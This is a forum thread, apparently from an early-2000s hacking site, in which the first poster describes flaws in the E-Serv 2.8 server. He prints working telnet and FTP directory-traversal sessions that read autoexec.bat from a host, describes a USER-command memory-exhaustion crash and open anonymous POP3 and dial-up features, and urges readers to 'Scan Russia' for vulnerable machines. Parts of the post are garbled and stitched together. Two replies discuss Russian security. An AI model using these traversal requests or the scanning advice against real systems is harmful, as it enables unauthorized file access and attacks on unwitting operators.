Results 1 to 3 of 3

Thread: Russia Security

  1. #1
    I am a cracker
    Guest

    Talking Russia Security

    Last night when I was on the Internet at 4:20 am I was "chillin" like usual, I wanted to see if I could find security issues in other countries (besides America)Let me tell you other countries China, Russia etc... Have many many security promblems, holes, and this is what I found
    FTP russia security

    The first occurs when the daemon is fed over 40 or
    so "USER whatever" strings. The FTP runs out of memory.
    E-Serv is a SMTP, POP3, NNTP, FTP, HTTP, Proxy,
    When testing out The HTTP server on a computer is
    accesible by default on Port 3128 and will most probably be moved to port 80 on
    servers where it's being used as a webserver (It is also the Proxy's remote
    administration), I found it to have a very serious security flaw. All
    versions prior to 2.8 are vulnerable. Regardless, updated versions are still common and I don't think the vulnerability
    has been covered publically, here at antionline.com so here it is!

    [drew@Tali-fusion]$ telnet .windows.box 3128
    Trying 192.168.66.7...
    Connected to tali.windoze.box.
    Escape character is '^]'.
    GET /../../../../../../../../../../../../../../autoexec.bat HTTP/1.1

    HTTP/1.1 200 OK
    Content-Length: 597

    @echo off
    SET BLASTER=A220 I5 D1 T4
    PATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\JDK\BIN

    CHOICE /C:YN /T:N,05 "Load SoftICE Debugger?"
    If Errorlevel=2 Goto End
    If Errorlevel=1 goto Softice

    :SoftIce
    echo Softice Loading
    C:\wyze1\exec\SOFTICE\WINICE.EXE
    goto end
    :End
    echo Starting Windows

    C:\wyze1>ftp localhost
    Connected to
    220 Eserv/2.8 FTP ready
    User (none)): anonymous
    331 Password required
    Password:
    230 Login OK
    ftp> ls /../../../../../../../../../../../
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp> ls ../../../../../../../../../../../
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp> ls
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp> get ../../../../../../../../../autoexec.bat
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp: 425 bytes received in 0.05Seconds 8.42Kbytes/sec.
    ftp> quit
    221 Goodbye.

    . Also that the FTP server will be on port
    3121 by default, and may be moved to port 21 on some computers

    that will probably apply to current versions
    as well: so an E-Serv server can be a nice anonymous mail pickup for anyone who cares
    to connect to the POP3 daemon and login anonymously. The daemon also does
    stuff like making the modem dial/hangup CGI feature (http://host:3128/dial)
    accessible to anyone with a user-level login, including anonymous, although it
    can be configured to be (dmin only, is like this by default. for the
    webmail interface accepting anonymous logins. - A hint: looking
    for lamers that run E-Serv? Scan Russia.
    hope this helps

  2. #2
    Senior Member
    Join Date
    Dec 2001
    Posts
    137
    hmm intresting..... I wonder why these countries don't upgrade their systems? I searched google for E-serv 2.8 and i got a bunch of listings of this exploit.... weird. Maby they don't care.. LOL
    My two cents,
    XPaCiScOoL

    [glowpurple]\"Your Smallest Flaw is my greatest Strength.\" - Me[/glowpurple]

  3. #3
    Banned
    Join Date
    Oct 2001
    Posts
    1,459
    Im from Russia.. And if you think this security is Lax try finding a website from a 3rd world country, the security there would be horrible... Im not even trying to defend my country, because its true... The level of computer security their sucks ass... But if you look at any .ru website that isnt hosted off of some guys 50Mhz Win95 box, you will see that the websites are actually secure.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •